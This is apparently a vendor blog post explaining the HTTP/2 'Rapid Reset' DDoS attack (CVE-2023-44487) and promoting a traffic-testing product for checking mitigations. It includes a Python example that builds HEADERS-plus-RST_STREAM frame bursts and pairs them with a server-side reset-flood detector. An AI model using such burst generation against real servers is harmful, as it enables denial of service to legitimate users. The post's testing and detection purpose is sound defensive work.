In this two-part blog, we will explore the recent “Rapid Reset” distributed denial of service (DDoS) attack that generated a record-setting 398 million requests per second at its peak.
In this first blog, we will review the fundamental components of this attack and the recent Keysight BreakingPoint update that empowers users to directly test their systems’ ability to mitigate this attack.
In part two, we will demonstrate how BreakingPoint, when coupled with Keysight’s hyperscale APS-100/400GE series appliances or our CloudStorm load modules, can generate the Rapid Reset attack at scale, allowing users to recreate the record-setting request rates this DDoS attack produced in the wild.
On Oct 10, 2023, Cloudflare, Google, Amazon Web Services (AWS), Microsoft and others released information about a DDoS attack called “Rapid Reset” (CVE-2023-44487) which set a dubious new record of nearly 398 million malicious requests per second, more than 7.5 times the rate seen in the previous record-breaking attack.
DDoS attacks are cyber-attacks that flood a target system with traffic in an effort to starve that system of resources. In so doing, these attacks can deny those same resources to legitimate users, potentially induce system crashes, or simply act as a “smoke screen” to conceal additional attacks launched against the same target system.
The Rapid Reset DDoS attack leverages a core feature of the HTTP/2 protocol, stream multiplexing, which allows many request streams to be in flight simultaneously over a single TCP connection, an enhancement that improves performance over HTTP/1.1 (where requests on a connection are handled one after another). Rapid Reset abuses this feature, together with the protocol’s ability to cancel an individual stream with a RST_STREAM frame, turning standards-compliant behaviour into a zero-day vulnerability.
First the malicious client opens a large number of HTTP/2 request streams on a single connection. It then immediately cancels each of these streams (RST_STREAM) and sends a fresh batch of requests, repeating this cycle over and over. Because a cancelled stream no longer counts against the server’s advertised limit on concurrent streams, the client can open new streams far faster than that limit alone would allow. Meanwhile, the server has already expended resources on each request (parsing headers, routing it, possibly contacting a backend) by the time it processes the cancellation. By rapidly repeating this process, the malicious client can overwhelm the target system as it tries to keep up with the flood of requests and resets.
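As an added illustration (this is example code written for this edit, not part of the Keysight post and not BreakingPoint code), the following Python builds the attacker’s HEADERS-then-RST_STREAM burst as raw HTTP/2 frames and runs it through a minimal server-side accounting routine. It shows why a conventional concurrent-stream limit never trips under Rapid Reset while a per-connection cancellation-rate check does. Frame layout follows RFC 9113 and the HPACK encoding follows RFC 7541; the thresholds (50 cancellations, 50% of streams) and the host name example.test are assumptions chosen for the example.

```python
import struct

# HTTP/2 frame types and flags needed here (RFC 9113, sections 4.1 and 6).
HEADERS = 0x1
RST_STREAM = 0x3
FLAG_END_STREAM = 0x1
FLAG_END_HEADERS = 0x4
CANCEL = 0x8            # RST_STREAM error code used by the attack


def _hpack_literal(name: str, value: str) -> bytes:
    """HPACK 'literal header field without indexing, new name' (RFC 7541 6.2.2),
    raw (non-Huffman) strings. Values here are short, so single-byte length
    prefixes are enough; the server still has to fully decode each request."""
    n, v = name.encode(), value.encode()
    assert len(n) < 127 and len(v) < 127
    return b"\x00" + bytes([len(n)]) + n + bytes([len(v)]) + v


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """Serialise one frame: 24-bit length, type, flags, 31-bit stream id, payload."""
    header = len(payload).to_bytes(3, "big") + bytes([ftype, flags])
    return header + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload


def rapid_reset_burst(first_stream: int, count: int, path: str = "/") -> bytes:
    """Attacker side: for each of `count` streams, a complete GET in one HEADERS
    frame immediately followed by RST_STREAM(CANCEL) on the same stream id.
    Client-initiated ids are odd and increasing. example.test is a placeholder."""
    out = bytearray()
    for i in range(count):
        sid = first_stream + 2 * i
        req = (_hpack_literal(":method", "GET") + _hpack_literal(":path", path)
               + _hpack_literal(":scheme", "https")
               + _hpack_literal(":authority", "example.test"))
        out += frame(HEADERS, FLAG_END_HEADERS | FLAG_END_STREAM, sid, req)
        out += frame(RST_STREAM, 0, sid, struct.pack(">I", CANCEL))
    return bytes(out)


def parse_frames(data: bytes):
    """Yield (type, flags, stream_id, payload) for each complete frame in `data`."""
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        sid = struct.unpack(">I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) < length:
            break                      # truncated frame; wait for more bytes
        yield ftype, flags, sid, payload
        off += 9 + length


class ConnectionState:
    """Server-side accounting for one connection.

    `max_concurrent` models SETTINGS_MAX_CONCURRENT_STREAMS (commonly 100).
    Rapid Reset never trips it, because each stream is cancelled before the
    next opens. The cancellation-rate check (thresholds are assumptions for
    this example) is similar in spirit to the per-connection RST_STREAM
    limits the affected vendors described in their mitigations."""

    def __init__(self, max_concurrent=100, max_cancels=50, cancel_ratio=0.5):
        self.max_concurrent = max_concurrent
        self.max_cancels = max_cancels
        self.cancel_ratio = cancel_ratio
        self.open = set()       # streams with HEADERS seen and no RST_STREAM yet
        self.opened = 0         # total client-initiated streams
        self.cancelled = 0      # streams the client reset
        self.peak_concurrent = 0

    def feed(self, data: bytes) -> str:
        for ftype, flags, sid, payload in parse_frames(data):
            if ftype == HEADERS and sid not in self.open:
                # Server-side work (parsing, routing, backend call) starts here.
                self.open.add(sid)
                self.opened += 1
                self.peak_concurrent = max(self.peak_concurrent, len(self.open))
            elif ftype == RST_STREAM and sid in self.open:
                self.open.discard(sid)
                self.cancelled += 1
        return self.verdict()

    def verdict(self) -> str:
        if self.peak_concurrent > self.max_concurrent:
            return "stream-limit"                 # the classic check
        if (self.cancelled >= self.max_cancels
                and self.cancelled / self.opened >= self.cancel_ratio):
            return "reset-flood"                  # send GOAWAY and close
        return "ok"


if __name__ == "__main__":
    st = ConnectionState()
    print(st.feed(rapid_reset_burst(1, 200)), st.opened, st.cancelled, st.peak_concurrent)
```

Running the block prints `reset-flood 200 200 1`: two hundred requests were started and cancelled on one connection while the number of concurrently open streams never exceeded one, which is exactly why a limit on concurrent streams is not, by itself, a defence against this attack.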
While Cloudflare, Google, Amazon AWS, Microsoft and others have released updates and guidance to help mitigate the effects of this attack, it is critical that users test their own mitigation systems to ensure their infrastructure and services are in fact protected against this vulnerability.
This is where Keysight’s BreakingPoint application and security test tool can help.
BreakingPoint’s Application and Threat Intelligence (ATI) team works around the clock to provide up-to-date applications and security content, empowering users to test their systems’ ability to handle the newest applications and withstand the latest attacks. Within 8 days of the vulnerability being publicly disclosed, Keysight released an ATI update that allows users to quickly and easily emulate the Rapid Reset DDoS attack to test the resilience of their systems and services in the face of this threat.
What follows is a brief description of these testing capabilities.
In this example, we run the test in “two-arm” mode, where BreakingPoint emulates both the test clients and servers, with the device under test (DUT) passing traffic between the two. However, you can also run the test in “one-arm” mode and send test traffic directly to your own server or service.
The first step is to download the latest ATI update to ensure the latest content, including the Rapid Reset DDoS attack, is available in the BreakingPoint test tool.
Next, we create two Application Simulator components in BreakingPoint: one called “Legitimate Enterprise Datacenter” that sends the legitimate traffic mix typical of an enterprise datacenter (SMTP, DNS, FTP, HTTP, etc.), and one called “DDoS Attack Traffic” that sends the Rapid Reset DDoS attack traffic.
We start the test by sending only the legitimate “Keysight Enterprise Datacenter” traffic, to establish the baseline load on the DUT. From the BreakingPoint real-time results view, we can see the legitimate traffic flowing successfully through the DUT and that the DUT’s CPU usage is low.
We then add the malicious Rapid Reset DDoS attack traffic, allowing us to see its impact on the DUT. We quickly see the DUT’s CPU usage spike to 99%, and BreakingPoint starts reporting errors as the legitimate “Keysight Enterprise Datacenter” traffic begins timing out: the DUT is overwhelmed by the malicious traffic and can no longer process the legitimate traffic.
We then ramp down the malicious traffic, leaving only the legitimate, “Keysight Enterprise Datacenter” traffic flowing for the remainder of the test, allowing us to see the DUT recover as the attack traffic ramps down.
Once the test is complete, we can then view the detailed results report to see the impacts of the DDoS attack on key performance indicators like throughput, connection rate and more.
Stay tuned for part 2 of this blog, “Harnessing Unparalleled Scalability: Recreating 398 Million RPS with Keysight BreakingPoint” in which we will demonstrate how you can use either Keysight’s scalable APS-100/400GE series appliances or our powerful CloudStorm load modules to emulate the Rapid Reset DDoS attack at hyperscale.
By harnessing the power of just three APS-ONE-100 appliances or three CloudStorm load modules, organizations can emulate this staggering attack volume with exceptional precision. The APS-ONE-100 appliance and the CloudStorm load modules both offer a level of scalability and versatility that sets a new industry standard. These hardware solutions not only empower users to test their systems’ ability to withstand such attacks but also demonstrate Keysight’s commitment to staying at the forefront of DDoS mitigation technology, helping organizations ensure they are fortified against even the most formidable DDoS threats.
Learn more about the APS-100/400GE series appliances, CloudStorm load modules and BreakingPoint application and security test tool.
For more information on mitigating DDoS attacks, including the Rapid Reset attack, please visit: